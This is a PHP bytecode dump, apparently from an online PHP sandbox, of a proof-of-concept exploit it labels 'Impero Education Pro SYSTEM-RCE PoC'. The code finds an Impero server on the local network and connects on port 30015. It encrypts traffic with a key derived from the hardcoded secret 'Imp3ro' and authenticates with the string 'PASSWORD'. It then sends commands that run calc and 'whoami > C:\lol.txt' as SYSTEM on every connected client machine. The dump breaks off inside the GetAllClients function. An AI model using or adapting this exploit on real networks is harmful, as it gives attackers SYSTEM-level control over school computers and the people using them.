Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 15
Branch analysis from position: 4
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 15
2 jumps found. (Code = 77) Position 1 = 19, Position 2 = 71
Branch analysis from position: 19
2 jumps found. (Code = 78) Position 1 = 20, Position 2 = 71
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 24, Position 2 = 46
Branch analysis from position: 24
2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 29
Branch analysis from position: 28
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 29
2 jumps found. (Code = 43) Position 1 = 41, Position 2 = 42
Branch analysis from position: 41
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 42
2 jumps found. (Code = 43) Position 1 = 52, Position 2 = 53
Branch analysis from position: 52
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 53
2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 70
Branch analysis from position: 69
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 70
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 46
Branch analysis from position: 71
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 71
filename:       /in/f2jt8
function name:  (null)
number of ops:  73
compiled vars:  !0 = $socketid, !1 = $argc, !2 = $argv, !3 = $arg, !4 = $key, !5 = $detected, !6 = $h, !7 = $clients
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  141     0  E >    ASSIGN                    !0, -1
  142     1         ECHO                      '%5B%2A%5D+Impero+Education+Pro+SYSTEM-RCE+PoC+by+slipstream%2FRoL%5ELHQ%0A'
  143     2         IS_SMALLER                !1, 2
          3       > JMPZ                      ~9, ->15
  144     4    >    FETCH_DIM_R               ~10  !2, 0
          5         CONCAT                    ~11  '%5B-%5D+Usage%3A+', ~10
          6         CONCAT                    ~12  ~11, '+%3CserverIPs+space-delimited%3E%0A'
          7         ECHO                      ~12
  145     8         ECHO                      '%5B%2A%5D+If+you+pass+%22detect+%3Cif%3E+%3Cbroadcastmask%3E%22+%28without+quotes%29+as+serverIP+then+we+will+try+to+find+an+impero+server%2C+using+interface+and+broadcast+mask+given.%0A'
  146     9         FETCH_DIM_R               ~13  !2, 0
         10         CONCAT                    ~14  '%5B%2A%5D+Example+of+this%3A+', ~13
         11         CONCAT                    ~15  ~14, '+detect+vboxnet0+192.168.56.255%0A'
         12         ECHO                      ~15
  147    13         ECHO                      '%5B%2A%5D+This+PoC+will+pop+a+calc+and+run+whoami+%3E+C%3A%5Clol.txt+as+SYSTEM+on+%2Aevery+connected+client%2A%21%0A'
  148    14       > EXIT
  150    15    >    INIT_FCALL                'array_shift'
         16         SEND_REF                  !2
         17         DO_ICALL
  151    18       > FE_RESET_R                $17  !2, ->71
         19    > >  FE_FETCH_R                ~18  $17, !3, ->71
         20    >    ASSIGN                    !4, ~18
  152    21         ASSIGN                    !5, <false>
  153    22         IS_EQUAL                  !3, 'detect'
         23       > JMPZ                      ~21, ->46
  154    24    >    ADD                       ~22  !4, 2
         25         COUNT                     ~23  !2
         26         IS_SMALLER_OR_EQUAL       ~23, ~22
         27       > JMPZ                      ~24, ->29
         28    > >  JMP                       ->19
  155    29    >    ECHO                      '%5B%2A%5D+Finding+Impero+server...%0A'
  156    30         INIT_FCALL                'findimperoserver'
         31         ADD                       ~25  !4, 1
         32         FETCH_DIM_R               ~26  !2, ~25
         33         SEND_VAL                  ~26
         34         ADD                       ~27  !4, 2
         35         FETCH_DIM_R               ~28  !2, ~27
         36         SEND_VAL                  ~28
         37         DO_FCALL                  0  $29
         38         ASSIGN                    !3, $29
  157    39         BOOL_NOT                  ~31  !3
         40       > JMPZ                      ~31, ->42
         41    > >  EXIT                      '%5B-%5D+Cannot+find+Impero+server%0A'
  158    42    >    CONCAT                    ~32  '%5B%2B%5D+Found+Impero+server+at+', !3
         43         CONCAT                    ~33  ~32, '%0A'
         44         ECHO                      ~33
  159    45         ASSIGN                    !5, <true>
  161    46    >    INIT_FCALL                'connect'
         47         SEND_VAR                  !3
         48         DO_FCALL                  0  $35
         49         ASSIGN                    !6, $35
  162    50         TYPE_CHECK                4  !6
         51       > JMPZ                      ~37, ->53
         52    > >  JMP                       ->19
  163    53    >    INIT_FCALL                'getallclients'
         54         SEND_VAR                  !6
         55         DO_FCALL                  0  $38
         56         ASSIGN                    !7, $38
  164    57         INIT_FCALL                'runexeassystem'
         58         SEND_VAR                  !6
         59         SEND_VAR                  !7
         60         SEND_VAL                  'calc'
         61         DO_FCALL                  0
  165    62         INIT_FCALL                'runcmd'
         63         SEND_VAR                  !6
         64         SEND_VAR                  !7
         65         SEND_VAL                  'whoami+%3E+C%3A%5Clol.txt'
         66         DO_FCALL                  0
  166    67         ECHO                      '%0A'
  167    68       > JMPZ                      !5, ->70
         69    > >  EXIT
  151    70    > >  JMP                       ->19
         71    >    FE_FREE                   $17
  168    72       > RETURN                    1

Function padstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 9
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9
Branch analysis from position: 20
Branch analysis from position: 9
filename:       /in/f2jt8
function name:  PadString
number of ops:  27
compiled vars:  !0 = $str, !1 = $size, !2 = $pad, !3 = $padstr, !4 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >    RECV                      !0
    7     1         ASSIGN                    !1, 16
    8     2         STRLEN                    ~6  !0
          3         MOD                       ~7  ~6, !1
          4         SUB                       ~8  !1, ~7
          5         ASSIGN                    !2, ~8
    9     6         ASSIGN                    !3, ''
   10     7         ASSIGN                    !4, 1
          8       > JMP                       ->18
   11     9    >    INIT_FCALL                'chr'
         10         INIT_FCALL                'mt_rand'
         11         SEND_VAL                  0
         12         SEND_VAL                  255
         13         DO_ICALL                  $12
         14         SEND_VAR                  $12
         15         DO_ICALL                  $13
         16         ASSIGN_OP                 8  !3, $13
   10    17         PRE_INC                   !4
         18    >    IS_SMALLER                !4, !2
         19       > JMPNZ                     ~16, ->9
   12    20    >    CONCAT                    ~17  !0, !3
         21         INIT_FCALL                'chr'
         22         SEND_VAR                  !2
         23         DO_ICALL                  $18
         24         CONCAT                    ~19  ~17, $18
         25       > RETURN                    ~19
   13    26*      > RETURN                    null

End of function padstring

Function unpadstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  UnPadString
number of ops:  16
compiled vars:  !0 = $str
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   15     0  E >    RECV                      !0
   16     1         INIT_FCALL                'substr'
          2         SEND_VAR                  !0
          3         SEND_VAL                  0
          4         INIT_FCALL                'ord'
          5         INIT_FCALL                'substr'
          6         SEND_VAR                  !0
          7         SEND_VAL                  -1
          8         DO_ICALL                  $1
          9         SEND_VAR                  $1
         10         DO_ICALL                  $2
         11         MUL                       ~3  $2, -1
         12         SEND_VAL                  ~3
         13         DO_ICALL                  $4
         14       > RETURN                    $4
   17    15*      > RETURN                    null

End of function unpadstring

Function cryptstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  CryptString
number of ops:  33
compiled vars:  !0 = $str, !1 = $hash, !2 = $key, !3 = $iv, !4 = $crypted
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   19     0  E >    RECV                      !0
   20     1         INIT_FCALL                'hash'
          2         SEND_VAL                  'sha512'
          3         SEND_VAL                  'Imp3ro'
          4         SEND_VAL                  <true>
          5         DO_ICALL                  $5
          6         ASSIGN                    !1, $5
   21     7         INIT_FCALL                'substr'
          8         SEND_VAR                  !1
          9         SEND_VAL                  0
         10         SEND_VAL                  32
         11         DO_ICALL                  $7
         12         ASSIGN                    !2, $7
   22    13         INIT_FCALL                'substr'
         14         SEND_VAR                  !1
         15         SEND_VAL                  32
         16         SEND_VAL                  16
         17         DO_ICALL                  $9
         18         ASSIGN                    !3, $9
   23    19         INIT_FCALL_BY_NAME        'mcrypt_encrypt'
         20         FETCH_CONSTANT            ~11  'MCRYPT_RIJNDAEL_128'
         21         SEND_VAL_EX               ~11
         22         SEND_VAR_EX               !2
         23         INIT_FCALL                'padstring'
         24         SEND_VAR                  !0
         25         DO_FCALL                  0  $12
         26         SEND_VAR_NO_REF_EX        $12
         27         SEND_VAL_EX               'cbc'
         28         SEND_VAR_EX               !3
         29         DO_FCALL                  0  $13
         30         ASSIGN                    !4, $13
   24    31       > RETURN                    !4
   25    32*      > RETURN                    null

End of function cryptstring

Function decryptstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  DecryptString
number of ops:  32
compiled vars:  !0 = $str, !1 = $hash, !2 = $key, !3 = $iv
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   27     0  E >    RECV                      !0
   28     1         INIT_FCALL                'hash'
          2         SEND_VAL                  'sha512'
          3         SEND_VAL                  'Imp3ro'
          4         SEND_VAL                  <true>
          5         DO_ICALL                  $4
          6         ASSIGN                    !1, $4
   29     7         INIT_FCALL                'substr'
          8         SEND_VAR                  !1
          9         SEND_VAL                  0
         10         SEND_VAL                  32
         11         DO_ICALL                  $6
         12         ASSIGN                    !2, $6
   30    13         INIT_FCALL                'substr'
         14         SEND_VAR                  !1
         15         SEND_VAL                  32
         16         SEND_VAL                  16
         17         DO_ICALL                  $8
         18         ASSIGN                    !3, $8
   31    19         INIT_FCALL                'unpadstring'
         20         INIT_FCALL_BY_NAME        'mcrypt_decrypt'
         21         FETCH_CONSTANT            ~10  'MCRYPT_RIJNDAEL_128'
         22         SEND_VAL_EX               ~10
         23         SEND_VAR_EX               !2
         24         SEND_VAR_EX               !0
         25         SEND_VAL_EX               'cbc'
         26         SEND_VAR_EX               !3
         27         DO_FCALL                  0  $11
         28         SEND_VAR                  $11
         29         DO_FCALL                  0  $12
         30       > RETURN                    $12
   32    31*      > RETURN                    null

End of function decryptstring

Function sendnetwork:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  SendNetwork
number of ops:  18
compiled vars:  !0 = $h, !1 = $str, !2 = $socketid, !3 = $crypted
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   34     0  E >    RECV                      !0
          1         RECV                      !1
   35     2         BIND_GLOBAL               !2, 'socketid'
   36     3         INIT_FCALL                'cryptstring'
          4         CONCAT                    ~4  !2, '%7C'
          5         CONCAT                    ~5  ~4, !1
          6         SEND_VAL                  ~5
          7         DO_FCALL                  0  $6
          8         ASSIGN                    !3, $6
   37     9         INIT_FCALL_BY_NAME        'socket_write'
         10         SEND_VAR_EX               !0
         11         STRLEN                    ~8  !3
         12         CONCAT                    ~9  ~8, '%7C'
         13         CONCAT                    ~10  ~9, !3
         14         SEND_VAL_EX               ~10
         15         DO_FCALL                  0
   38    16       > RETURN                    null
   39    17*      > RETURN                    null

End of function sendnetwork

Function recvnetwork:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 44) Position 1 = 11, Position 2 = 3
Branch analysis from position: 11
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 16
Branch analysis from position: 15
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 37, Position 2 = 39
Branch analysis from position: 37
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 39
Branch analysis from position: 3
filename:       /in/f2jt8
function name:  RecvNetwork
number of ops:  42
compiled vars:  !0 = $h, !1 = $len, !2 = $chr, !3 = $crypted, !4 = $dec, !5 = $socketid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   41     0  E >    RECV                      !0
   42     1         ASSIGN                    !1, ''
   43     2         ASSIGN                    !2, ''
   45     3    >    ASSIGN_OP                 8  !1, !2
   46     4         INIT_FCALL_BY_NAME        'socket_read'
          5         SEND_VAR_EX               !0
          6         SEND_VAL_EX               1
          7         DO_FCALL                  0  $9
          8         ASSIGN                    !2, $9
   47     9         IS_NOT_EQUAL              !2, '%7C'
         10       > JMPNZ                     ~11, ->3
   48    11    >    CAST                      4  ~12  !1
         12         ASSIGN                    !1, ~12
   49    13         IS_SMALLER                !1, 1
         14       > JMPZ                      ~14, ->16
         15    > >  EXIT                      'Something%27s+wrong.+Length+isn%27t+an+int.'
   50    16    >    INIT_FCALL_BY_NAME        'socket_set_block'
         17         SEND_VAR_EX               !0
         18         DO_FCALL                  0
   51    19         INIT_FCALL_BY_NAME        'socket_read'
         20         SEND_VAR_EX               !0
         21         SEND_VAR_EX               !1
         22         DO_FCALL                  0  $16
         23         ASSIGN                    !3, $16
   52    24         INIT_FCALL                'decryptstring'
         25         SEND_VAR                  !3
         26         DO_FCALL                  0  $18
         27         ASSIGN                    !4, $18
   53    28         BIND_GLOBAL               !5, 'socketid'
   54    29         INIT_FCALL                'explode'
         30         SEND_VAL                  '%7C'
         31         SEND_VAR                  !4
         32         SEND_VAL                  2
         33         DO_ICALL                  $20
         34         ASSIGN                    !4, $20
   55    35         IS_EQUAL                  !5, -1
         36       > JMPZ                      ~22, ->39
         37    >    FETCH_DIM_R               ~23  !4, 0
         38         ASSIGN                    !5, ~23
   56    39    >    FETCH_DIM_R               ~25  !4, 1
         40       > RETURN                    ~25
   57    41*      > RETURN                    null

End of function recvnetwork

Function connect:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 17, Position 2 = 24
Branch analysis from position: 17
2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 27
Branch analysis from position: 25
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 27
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 41
Branch analysis from position: 39
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 42) Position 1 = 55
Branch analysis from position: 55
2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48
Branch analysis from position: 57
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 48
2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48
Branch analysis from position: 57
Branch analysis from position: 48
Branch analysis from position: 24
filename:       /in/f2jt8
function name:  Connect
number of ops:  60
compiled vars:  !0 = $host, !1 = $port, !2 = $h, !3 = $data, !4 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   59     0  E >    RECV                      !0
          1         RECV_INIT                 !1  30015
   60     2         ECHO                      'Connecting...'
   61     3         INIT_FCALL_BY_NAME        'socket_create'
          4         FETCH_CONSTANT            ~5  'AF_INET'
          5         SEND_VAL_EX               ~5
          6         FETCH_CONSTANT            ~6  'SOCK_STREAM'
          7         SEND_VAL_EX               ~6
          8         FETCH_CONSTANT            ~7  'SOL_TCP'
          9         SEND_VAL_EX               ~7
         10         DO_FCALL                  0  $8
         11         ASSIGN                    !2, $8
   62    12         INIT_FCALL_BY_NAME        'socket_set_block'
         13         SEND_VAR_EX               !2
         14         DO_FCALL                  0
   63    15         BOOL_NOT                  ~11  !2
         16       > JMPNZ_EX                  ~11  ~11, ->24
         17    >    INIT_FCALL_BY_NAME        'socket_connect'
         18         SEND_VAR_EX               !2
         19         SEND_VAR_EX               !0
         20         SEND_VAR_EX               !1
         21         DO_FCALL                  0  $12
         22         BOOL_NOT                  ~13  $12
         23         BOOL                      ~11  ~13
         24    > >  JMPZ                      ~11, ->27
   64    25    >    ECHO                      'failed.%0A'
   65    26       > RETURN                    <false>
   67    27    >    ECHO                      'done%21%0AAuthenticating...'
   69    28         INIT_FCALL                'sendnetwork'
         29         SEND_VAR                  !2
         30         SEND_VAL                  'AUTHENTICATE%02PASSWORD'
         31         DO_FCALL                  0
   70    32         ECHO                      'done%21%0AWaiting+for+response...'
   72    33         INIT_FCALL                'recvnetwork'
         34         SEND_VAR                  !2
         35         DO_FCALL                  0  $15
         36         ASSIGN                    !3, $15
   73    37         IS_NOT_EQUAL              !3, 'AUTH%3AOK'
         38       > JMPZ                      ~17, ->41
   74    39    >    ECHO                      'authentication+failed.%0A'
   75    40       > RETURN                    <false>
   77    41    >    ECHO                      'authentication+succeeded%21%0ANegotiating...'
   78    42         INIT_FCALL                'sendnetwork'
         43         SEND_VAR                  !2
         44         SEND_VAL                  'PING1%02IE11WIN7%03%035003%019f579e0f20cb18c8bc1ee4f2dc5d9aeb%01c0d3fd41a05add5e6d7c8b64924bef86%018dc3a6ceec8a51e1fd2e7e688db44417%01d1554e349fc677e6011309683ac1b85b%012b94f70093e484b8fc7f62a4670377ea'
         45         DO_FCALL                  0
   80    46         ASSIGN                    !4, 0
         47       > JMP                       ->55
   81    48    >    INIT_FCALL                'recvnetwork'
         49         SEND_VAR                  !2
         50         DO_FCALL                  0
   82    51         INIT_FCALL                'usleep'
         52         SEND_VAL                  500000
         53         DO_ICALL
   80    54         PRE_INC                   !4
         55    >    IS_SMALLER                !4, 4
         56       > JMPNZ                     ~23, ->48
   85    57    >    ECHO                      'done%21%0A'
   86    58       > RETURN                    !2
   87    59*      > RETURN                    null

End of function connect

Function getallclients:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 32, Position 2 = 43
Branch analysis from position: 32
2 jumps found. (Code = 78) Position 1 = 33, Position 2 = 43
Branch analysis from position: 33
1 jumps found. (Code = 42) Position 1 = 32
Branch analysis from position: 32
Branch analysis from position: 43
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 43
filename:       /in/f2jt8
function name:  GetAllClients
number of ops:
Generated using Vulcan Logic Dumper, using php 8.0.0